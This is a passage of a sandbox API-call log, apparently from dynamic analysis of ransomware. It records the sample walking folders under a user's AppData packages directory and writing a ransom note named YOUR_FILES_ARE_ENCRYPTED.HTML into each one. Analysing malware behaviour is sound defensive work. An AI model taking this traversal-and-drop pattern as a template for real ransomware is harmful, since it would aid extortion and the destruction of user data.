ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f6c454, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.038] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33f6c454, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33f6c454, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33f6c454, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.038] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.038] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.038] GetProcessHeap () returned 0x600000 [0115.038] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.039] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.041] CloseHandle (hObject=0x324) returned 1 [0115.041] GetProcessHeap () returned 0x600000 [0115.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.041] GetProcessHeap () returned 0x600000 [0115.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.042] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.042] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.042] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState") returned 95 [0115.042] GetProcessHeap () returned 0x600000 [0115.042] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.043] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState" [0115.043] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState\\*" [0115.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.044] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.044] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.044] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.044] GetProcessHeap () returned 0x600000 [0115.044] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.045] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.046] CloseHandle (hObject=0x324) returned 1 [0115.047] GetProcessHeap () returned 0x600000 [0115.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.047] GetProcessHeap () returned 0x600000 [0115.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.047] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x33e61382, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33e61382, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.048] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.048] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0115.048] GetProcessHeap () returned 0x600000 [0115.048] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.appconnector_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.051] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.052] CloseHandle (hObject=0x214) returned 1 [0115.052] GetProcessHeap () returned 0x600000 [0115.052] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.052] GetProcessHeap () returned 0x600000 [0115.052] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.054] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e197ac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e197ac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.BingFinance_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.BIN")) returned 1 [0115.054] StrStrIW (lpFirst="Microsoft.BingFinance_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.054] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe") returned 84 [0115.054] GetProcessHeap () returned 0x600000 [0115.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.055] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe" [0115.055] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\*" [0115.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e197ac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e197ac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0115.057] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30aac39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30e197ac, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30e197ac, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.057] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x30b44c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.057] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.057] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC") returned 87 [0115.058] GetProcessHeap () returned 0x600000 [0115.058] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.059] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC" [0115.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\*" [0115.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x30b44c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.061] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x30b44c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="..", cAlternateFileName="")) returned 1 [0115.061] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.061] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.061] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache") returned 97 [0115.061] GetProcessHeap () returned 0x600000 [0115.061] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.062] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache" [0115.062] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.063] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 1 [0115.063] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 0 [0115.063] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.064] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.064] GetProcessHeap () returned 0x600000 [0115.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingfinance_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.066] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.067] CloseHandle (hObject=0x32c) returned 1 [0115.067] GetProcessHeap () returned 0x600000 [0115.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.067] GetProcessHeap () returned 0x600000 [0115.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.068] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318835a, dwReserved1=0x31882b0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.068] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.068] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies") returned 99 [0115.068] GetProcessHeap () returned 0x600000 [0115.068] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.070] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies" [0115.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.070] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 1 [0115.071] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x30bdd6ba, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x30bdd6ba, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x30bdd6ba, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fa8, dwReserved1=0x31882b8, cFileName="..", cAlternateFileName="")) returned 0 [0115.071] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.071] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingFinance_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.071] GetProcessHeap () returned 0x600000 [0115.071] 